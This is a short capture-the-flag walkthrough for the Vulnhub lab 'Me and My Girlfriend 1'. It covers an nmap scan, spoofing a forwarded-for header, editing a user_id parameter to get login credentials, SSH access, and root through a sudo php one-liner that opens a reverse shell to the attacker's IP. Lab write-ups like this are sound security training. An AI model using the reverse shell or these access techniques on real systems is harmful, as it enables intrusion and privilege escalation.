Me and My GirlFriend1 (Vulnhub)

VM LINK : https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova

root@kali:~/Downloads# nmap -A 192.168.199.130

Now on browser try to access the ip on port 80.


Now again try to access http://192.168.199.130

And we can see the x-forward header in request.

And we get

We have to see the URL  http://192.168.199.130/index.php?page=profile&user_id=12

Try to change

User_id=5 (http://192.168.199.130/index.php?page=profile&user_id=5)

We get

We can get the cred

Username : alice

Password : 4lic3

Now we like to go for shell

root@kali:~/Downloads# ssh alice@192.168.199.130

Now proceed further

alice@gfriEND:~$ ls –la

alice@gfriEND:~$ cd .my_secret/

alice@gfriEND:~/.my_secret$ ls –la

alice@gfriEND:~/.my_secret$ cat flag1.txt

alice@gfriEND:~/.my_secret$ cat my_notes.txt

Now we like to go to privilege level

alice@gfriEND:~/.my_secret$ sudo –l

alice@gfriEND:~/.my_secret$ sudo /usr/bin/php -r ‘$sock=fsockopen(“192.168.199.129”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

We get the shell

@SAKSHAM DIXIT